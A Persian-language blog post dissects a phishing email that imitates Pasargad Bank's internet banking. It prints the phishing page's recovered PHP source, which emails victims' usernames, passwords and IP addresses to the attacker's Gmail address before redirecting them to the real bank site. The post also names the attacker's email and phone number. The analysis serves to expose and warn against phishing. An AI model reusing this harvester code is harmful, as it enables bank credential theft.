فیشینگ بانک پاسارگاد – پیدا کردن هکر

یه ایمیل برام اومد که با یه روش قدیمی و شناخته شده سعی در هک کردن اکانت حساب بانکی پاسارگادم داره؛ فیشینگ (Phishing).

pishing_pasargad

همنوطور که تو تصویر بالا قابل مشاهده هست لینک داخل ایمیل در ظاهر دقیقا لینک دسترسی به اینترنت بانک پاسارگاد هست ولی در باطن لینک شده به یه سایت دیگه که دقیقا عین سایت اصلی ساخته شده فقط هرچی توی فیلدهای این صفحه بنویسیم (شامل نام کاربری و کلمه عبور) رو برای هکر میفرسته و بعد هم صفحه اصلی بانک رو نشون میده تا یه وقت به چیزی شک نکنیم و فکر کنیم که احتمالا خودمون فیلدی رو اشتباه وارد کردیم. با یه مهندسی اجتماعی ساده (اینکه کسی ۶ میلیون تومن پول ریخته به حسابمون) هم سعی کرده تحریکمون کنه که حتما لاگین کنیم.

pishing_pasargad_2

جالب اینجاست که این هک برای انگلیسی زبان‌ها ساخته شده و درگاه پرداخت اصلی هم به زبان انگلیسی هست.

خوشبختانه هم خود Thunderbird تشخیص داد که این ایمیل جعلی هست و هم وقتی روی لینک کلیک میکنیم یه پیغام میده که ظاهر این لینک با آدرسی که بهش اشاره کرده نمی‌خونه ولی اگر هکر یه کم حرفه‌ای‌تر بود میتونست کاری کنه که ایمیل اسپم نشه و این هشدار هم داده نشه. به هر حال من شک ندارم حداقل ۸۰ درصد مردم متوجه هیچ کدوم از این مسائل نمی‌شن و نام کاربری و کلمه عبورشون رو برای هکر میفرستن! متاسفانه، به همین راحتی.

به روز رسانی

خوشبختانه مثل اینکه این هکر ما یه مقداری ناشی هست. اگر به مسیر روت سایت فیشینگ برید میبیند که Directory Listing سرور رو نبسته و از اون بدتر نسخه zip شده سایت رو هم گذاشته روی سرور این یعنی سورس این صفحه در دسترس هست. کد PHP این صفحه فیشینگ به شکل زیره:

<?php  
$ip = getenv("REMOTE_ADDR");  

$message .= "--------------INFORMATION-------------------\n"; 
$message .= "User: ".$_POST['username']."\n"; 
$message .= "Pass: ".$_POST['password']."\n";
$message .= "IP: ".$ip."\n"; 
$message .= "---------------Created By Kizito +6289524438862--------------------\n"; 

$send = "kizito.bank@gmail.com"; 
$subject = "Pasargad"; 
$headers = "From:  iben.bpi.ir"; 
mail($send,$subject,$message,$headers); 

header("Location: https://iben.bpi.ir/");  
?> 

همونطور که مشخصه ایمیلی که اطلاعات قربانی‌ها براش ارسال میشه kizito.bank@gmail.com هست و البته برنامه‌نویس یه تلفن هم گذاشته (که مال اندونزی هست)! یه سناریو میتونه این باشه که یه آدم غیر فنی سفارش این هک رو به یه فریلنسر داده و ازش تحویل گرفته ولی موقعه بارگذاری چون مسائل امنیتی رو نمی‌دونسته اینطوری کدها رو در معرض دید عموم قرارداده. این برنامه‌نویس کلاه سیاه هم تلفنش رو گذاشته بوده واسه تبلیغ تا در انتهای هر ایمیل که برای کارفرما ارسال میشه در پایین نام کاربری و کلمه عبور قربانی‌ها بیاد. به قول معروف امضاء خودش رو اونجا گذاشته.

3 دیدگاه برای «فیشینگ بانک پاسارگاد – پیدا کردن هکر»

  1. یه سوتی جالب که وجود داره اینه که نسخه انگلیسی اینترنت بانک پاسارگاد روی آدرس
    https://iben.bpi.ir
    وجود داره (من با اطلاعات خودم واردش شدم) ولی در متن ایمیل در ظاهر آدرس نسخه اینترنت بانک فارسی را گذاشته
    به نظر من دو حالت وجود داره یا طرف خیلی ناشی بوده یا منظور دیگه ای داشته که به اون هدفش رسیده؟؟؟!!!

پاسخ دهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *